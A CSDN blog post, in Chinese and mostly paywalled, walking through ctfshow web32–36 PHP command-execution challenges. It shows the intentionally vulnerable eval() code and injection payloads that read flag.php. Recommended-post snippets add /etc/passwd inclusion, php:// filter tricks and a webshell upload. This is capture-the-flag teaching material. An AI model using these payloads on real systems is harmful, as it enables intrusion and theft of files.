ctfshow-web入门-命令执行(web32-36)

已于 2022-06-25 00:15:23 修改
阅读量1k 收藏 1
点赞数
分类专栏: #命令执行 ctfshow 文章标签: web安全
于 2022-06-25 00:15:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HkD01L/article/details/125453795
版权
本文详细介绍了在CTFShow的web32到web36关卡中,如何应对不同过滤条件,使用嵌套文件包含、伪协议、base64解码等方法来执行命令并获取flag。内容涵盖了对系统命令、PHP语法的绕过技巧和实战应用。
摘要由CSDN通过智能技术生成

 web32

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

 echo的过滤导致又有一些方法不能用了

失效的姿势:

因为过滤了system和反引号,所以

?c=`tac fla?.php`;

?c=echo `tac fl''ag.php`;

?c=echo `nl fl?g.php`;查看源代码

?c=`cp fla?.php 1.txt`;

没法用了

因为过滤了左括号,所以,

嵌套eval逃逸函数

show_source(next(array_reverse(scandir(pos(localeconv())))));

没法用了

嵌套文件包含,利用伪协议文件包含,再base64解码

最低0.47元/天 解锁文章
HkD01L
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFshow 命令执行 web32
Kradress的博客
10-29 345
源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:56:31 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); if(isset($_GET['c']))
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
ctfshow web入门 命令执行部分(32-36
羽的博客
09-05 3259
以下目测均为非预期 32 这个题过滤了空格属实有点难受,php中不用括号的有echo include等 过滤了分号可以用?>绕过。 尝试了以下,发现 include"/etc/passwd"?>可以执行成功。再去想下没有过滤$,我们可以用$_POST[1]呀include"\$_POST[1]"?>然后post传参1=/etc/passwd执行成功。还有一个问题include包含php文件不会在页面显示出来,灵机一动,伪协议呀!完美 33 payload ?c=include$_POST
CTFSHOW web入门——web32
m0_74093152的博客
04-23 442
因此可以构造payload:?可以将flag.php文件的内容转变成base64,然后将转换过的flag.php文件赋给a,再将a中的内容显示出来,最后将文件内容进行base64解码即可。过滤了flag、system、php、cat、sort、shell、echo以及一些符号。=是PHP的一个短的开放式标签,是echo()的快捷用法。
Ctfshow web入门-web32
qq_45427131的博客
05-13 1555
Ctfshow web入门-web32 WP 拿到url,首先查看源码 过滤了以下字符串 flag|system|php|cat|sort|shell|.| |’|`|echo|;|( 过滤了空格可以用${IFS}和%0a 代替,分号可以用?>代替 但是过滤了括号之后就不能用带有括号的函数,php中include是可以不带括号的函数,和web31一样,这里需要用文件包含 所以构造的Payload是 payload:http://url/?c=include%0a$_POST[1]?>
ctfshow-命令执行-web32
weixin_43400535的博客
10-28 817
ctfshow-web32 题目描述: 原理: 同web29 审计: <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:56:31 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_r
CTFshow 命令执行 web32 33 34 35 36
ChenD的学习笔记
11-08 881
CTFshow 命令执行 web32 web33 web34 web35 web36
ctfshow-web41~60-WP
最新发布
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
CTFShow-周末大挑战parse-url篇Writeup
05-19
这表明服务端没有对用户输入进行充分的过滤或转义,允许了任意命令执行。 第二关中,URL编码的方式被用来绕过过滤。`%68%74%74%70%3a%2f%2f%64%61%74%61%3a%3a%2f%2f%74%65%73%74%2f%70%6c%61%69%6e%3b%62%61%73%65...
ctfshow-web32(命令执行)
m0_62094846的博客
01-21 309
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:56:31 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); if(isset($_GET['c'])...
CTFshow-命令执行
qq_60905276的博客
07-04 718
CTFshow-命令执行
ctfshow---命令执行
fainpo的博客
03-20 1305
就是让标准输出重定向到/dev/null中(丢弃标准输出),然后错误输出由于重用了标准输出的描述符,所以错误输出也被定向到了/dev/null中,错误输出同样也被丢弃了。data://text/plain, 这样就相当于执行了php语句 .php 因为前面的php语句已经闭合了,所以后面的.php会被当成html页面直接显示在页面上,起不到什么作用。$((~$(( $((~$(())))+$((~$(())))+$((~$(()))) )))) 这个是2。
ctfshow web入门命令执行
uuzfumo的博客
12-17 1077
命令执行姿势
Bugku CTF web32(Web
ChaoYue_miku的博客
03-15 297
0、打开网页,我们发现需要进行文件上传,而且是图片文件 1、写一句话木马,改名为jpg文件后上传 上传成功,接下来抓包修改文件名 2、使用BrupSuite抓包,修改文件拓展名 分别将后缀名修改为php2, php3, php4, php5, phps, pht, phtm, phtml(php的别名),发现只有php4没有被过滤 注意这里有两处修改,第一处是大小写绕过 3、使用菜刀连接,查看根目录 4、得到flag:flag{e46b352d86f8f08b2
刷题之旅第32站,CTFshow web11
cc菜的一批
02-17 925
感谢ctf show平台提供题目 放眼望去,全是php代码,代码审计题目无疑了。 我们看到这部分,只要让输入框的内容 等于 session 的值就好了。 if($password==$_SESSION['password']){ 我们打开F12,找到存储,删除里面的phpsessionid 这样session的值就是空了,那么我们再提交空密码,就会相等了。 结语: 菜鸡的cc师傅,将会持...
《CTFshow-Web入门》04. Web 31~40
学习学习学习......
12-03 954
eval() 利用与正则绕过,PHP 伪协议、include() 利用。
CTFshow-Web30--45
2301_78260987的博客
07-13 192
大体意思就是从进行异或的字符中排除掉被过滤的,然后在判断异或得到的字符是否为可见字符。先通过以下php脚本生成一个rce_or.txt,内容是上述可用字符及编码。我们可以尝试从ascii为0-255的字符中,找到能够通过。到这一步其实就是用python主动提交payload。再通过以下自动化脚本传参并执行执行命令。可以如下图先运行php脚本先生成txt文件。不要被迷惑了,第一个等号是用来传参的。得到的可用字符及相应url编码。
ctfshow-web入门爆破
08-30
在ctfshow-web入门爆破中,可以使用正则爆破脚本来实现对目录的暴力破解。该脚本会将true拼接成数字,并以此来替换ASCII码中的数字、字母和特殊符号,以实现对目录的爆破。通过暴力破解目录/0-100/0-100/看返回数据包,可以在爆破过程中去掉2.txt,只爆破目录即可。可以通过查看返回的数据包来获取目录中的信息。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [ctfshow web185 正则爆破脚本](https://download.csdn.net/download/eason612/86793758)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [CTFshow web入门——爆破](https://blog.csdn.net/qq_49480008/article/details/112991503)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值